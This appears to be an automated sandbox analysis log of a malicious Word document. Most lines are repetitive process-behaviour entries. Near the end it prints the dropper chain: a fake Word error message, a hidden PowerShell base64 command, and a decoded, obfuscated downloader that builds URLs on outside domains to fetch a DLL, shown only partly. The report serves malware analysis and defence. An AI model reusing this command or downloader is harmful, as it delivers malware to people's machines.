Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5446Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3119Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6504Thread sleep count: 5446 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6504Thread sleep count: 3119 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: powershell.exe, 00000005.00000002.346040402.000001924AA20000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000005.00000002.345845297.000001924A64C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.346040402.000001924AA20000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000005.00000002.346040402.000001924AA20000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000005.00000002.346040402.000001924AA20000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo'); set-ITEM ("variaBle"+":l6U"+"YH"+"N") ([TYpe]("{5}{0}{7}{4}{8}{2}{3}{6}{1}"-F 'Y','Ger','EPoI','Ntm','TEM.Net.se','s','AnA','s','RvIc')); $Xdz_t_i=('Au'+('z0z'+'qx'));$Pii8oen=$B0xk04r + [char](64) + $Val6qax;$Lr_lqnw=(('Pk'+'9')+('1'+'5w')+'o'); ( iTEM varIABlE:CvngAS).vAlUE::"CREATe`di`ReCtORY"($HOME + (('{'+'0}Y'+'5'+'59jsv{0}Iewfmy3'+'{'+'0}') -F[CHaR]92));$M_dnbs4=('Q'+('u'+'gs')+('yo'+'d')); (Get-iTem ("vaRIaBLe"+":l6u"+"YH"+"n")).vaLuE::"sECuR`IT`yprOT`ocOL" = (('Tl'+'s')+'12');$X2thqmg=('J'+('zz'+'z6'+'2m'));$Qocy_bg = (('Pp'+'nq')+'9j');$Zy7z7hd=('Fg'+'04'+('cc'+'g'));$E5pam4e=('Wi'+('0'+'8j')+'ay');$Tpdue32=$HOME+((('MRPY'+'55')+('9j'+'s')+'v'+'M'+('R'+'PI')+'e'+('wfm'+'y3')+('MR'+'P'))."Re`PLaCE"(('M'+'RP'),'\'))+$Qocy_bg+('.d'+'ll');$R6utvyl=(('G'+'pr')+('s'+'79')+'j');$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;$Ny4mnvx=(('h'+(('t'+'tp:qq)('))+(('s'+'2)(qq'))+')'+(('('+'s2'))+((')'+'(op'))+('h'+'eli')+'a'+('sb'+'re'+'wery'+'.')+'c'+'om'+'q'+'q'+((')('+'s2'))+((')(w'+'p-'))+('in'+'c')+'l'+('u'+'de')+(('sq'+'q)(s2)(ciA'+'j'+'cg'))+(('jqq)(s2)(@http'+':q'+'q'+')'))+(('(s'+'2)(qq'+')'+'(s'))+'2'+((')('))+(('t'+'ong'+'daiha'+'noi.c'+'omqq)(s2'))+((')'+'(847346324'+'2'+'3'+'4234q'))+(('q)(s2'+')'+'('+'rpnvXm'))+'q'+'q'+((')'+'(s2'+')(@http'+':qq)'+'(s2)'+'(qq'))+((')'+'(s2'))+')'+(('(c'))+('he'+'rk')+'a'+'s'+('hc'+'han')+('u'+'.c')+(('om'+'qq)(s'+'2)('+'Z:qq'+')'))+(('(s2)'+'(4ZE8q'+'q'+')('))+'s
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo'); set-ITEM ("variaBle"+":l6U"+"YH"+"N") ([TYpe]("{5}{0}{7}{4}{8}{2}{3}{6}{1}"-F 'Y','Ger','EPoI','Ntm','TEM.Net.se','s','AnA','s','RvIc')); $Xdz_t_i=('Au'+('z0z'+'qx'));$Pii8oen=$B0xk04r + [char](64) + $Val6qax;$Lr_lqnw=(('Pk'+'9')+('1'+'5w')+'o'); ( iTEM varIABlE:CvngAS).vAlUE::"CREATe`di`ReCtORY"($HOME + (('{'+'0}Y'+'5'+'59jsv{0}Iewfmy3'+'{'+'0}') -F[CHaR]92));$M_dnbs4=('Q'+('u'+'gs')+('yo'+'d')); (Get-iTem ("vaRIaBLe"+":l6u"+"YH"+"n")).vaLuE::"sECuR`IT`yprOT`ocOL" = (('Tl'+'s')+'12');$X2thqmg=('J'+('zz'+'z6'+'2m'));$Qocy_bg = (('Pp'+'nq')+'9j');$Zy7z7hd=('Fg'+'04'+('cc'+'g'));$E5pam4e=('Wi'+('0'+'8j')+'ay');$Tpdue32=$HOME+((('MRPY'+'55')+('9j'+'s')+'v'+'M'+('R'+'PI')+'e'+('wfm'+'y3')+('MR'+'P'))."Re`PLaCE"(('M'+'RP'),'\'))+$Qocy_bg+('.d'+'ll');$R6utvyl=(('G'+'pr')+('s'+'79')+'j');$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;$Ny4mnvx=(('h'+(('t'+'tp:qq)('))+(('s'+'2)(qq'))+')'+(('('+'s2'))+((')'+'(op'))+('h'+'eli')+'a'+('sb'+'re'+'wery'+'.')+'c'+'om'+'q'+'q'+((')('+'s2'))+((')(w'+'p-'))+('in'+'c')+'l'+('u'+'de')+(('sq'+'q)(s2)(ciA'+'j'+'cg'))+(('jqq)(s2)(@http'+':q'+'q'+')'))+(('(s'+'2)(qq'+')'+'(s'))+'2'+((')('))+(('t'+'ong'+'daiha'+'noi.c'+'omqq)(s2'))+((')'+'(847346324'+'2'+'3'+'4234q'))+(('q)(s2'+')'+'('+'rpnvXm'))+'q'+'q'+((')'+'(s2'+')(@http'+':qq)'+'(s2)'+'(qq'))+((')'+'(s2'))+')'+(('(c'))+('he'+'rk')+'a'+'s'+('hc'+'han')+('u'+'.c')+(('om'+'qq)(s'+'2)('+'Z:qq'+')'))+(('(s2)'+'(4ZE8q'+'q'+')('))+'sJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBG